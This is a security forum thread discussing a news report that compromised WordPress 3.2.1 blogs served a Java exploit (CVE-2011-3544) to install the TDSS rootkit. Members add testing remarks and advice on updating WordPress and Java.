Hackers Infect WordPress 3.2.1 Blogs to Distribute TDSS Rootkit

Status
Not open for further replies.
MrXidus

MrXidus

Super Moderator (Leave of absence)
Thread author
Apr 17, 2011
2,503
Hackers are compromising WordPress 3.2.1 blogs in order to infect their visitors with the notorious TDSS rootkit, according to researchers from Web security firm Websense.

It's not clear how the websites are being compromised, but there are publicly known exploits for vulnerabilities that affect WordPress 3.2.1, which is an older version of the popular blog publishing platform.

Once they gain unauthorized access to a blog, the attackers inject malicious JavaScript code into its pages in order to load a Java exploit from a third-party server.

"From our analysis the number of infections is growing steadily (100+)," said Websense principal security researcher Stephan Chenette in a blog post on Monday. The company's research into this mass code injection campaign indicates that whoever is behind it is experienced.

The Java vulnerability exploited in the attack is known as CVE-2011-3544 and allows the remote execution of arbitrary code. In this case, the attackers are leveraging it to install a version of the TDSS rootkit on the computers of people visiting the website.

Read more...
Click to expand...

---

In my own findings I went ahead and tried to test this exploit. I downloaded the said Java version mentioned in the vulnerability report here.

You can watch my video here. The malicious site that was serving the exploit returns 404. A disappointment as I was wanting to get my hands on this Rootkit for the Malware Hub ;)

Maybe it's being served elsewhere on a new domain and other member could find the sample and perhaps share in the Malware Hub.

Cheers.
 
Prorootect

Prorootect

Level 69
Verified
Nov 5, 2011
5,855
.
WordPress Security new version releases: on wordpress.org: http://wordpress.org/news/category/security/

WP Security Scan: on wordpress.org: http://wordpress.org/extend/plugins/wp-security-scan/

So we must remain vigilant and always be informed of top security news.:cool:
 
Jack

Jack

Administrator
Verified
Staff Member
Well-known
Jan 24, 2011
9,378
WordPress 3.2.1 was released on July 12, 2011 , any remotely responsible Admin should have update by now the platform.......
while any remotely responsible user should have update Java to the latest version...
A TDSS Rootkit is a very nasty piece of malware, hopefully the users who got infected heard of Kaspersky TDSS killer
 
Status
Not open for further replies.

Similar threads

Gandalf_The_Grey
    • Like
    • Wow
    • +Reputation
Security News Windows driver zero-day exploited by Lazarus hackers to install rootkit (patched August 2024)
Replies
0
Views
1,580
Security News
Gandalf_The_Grey
Gandalf_The_Grey
[correlate]
    • Like
Jupiter X Core WordPress plugin could let hackers hijack sites
Replies
0
Views
997
News Archive
[correlate]
[correlate]
Gandalf_The_Grey
    • Like
    • +Reputation
    • Wow
Security News Unpatchable 0-day in surveillance cam is being exploited to install Mirai
Replies
1
Views
1,960
Security News
EASTER
EASTER

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top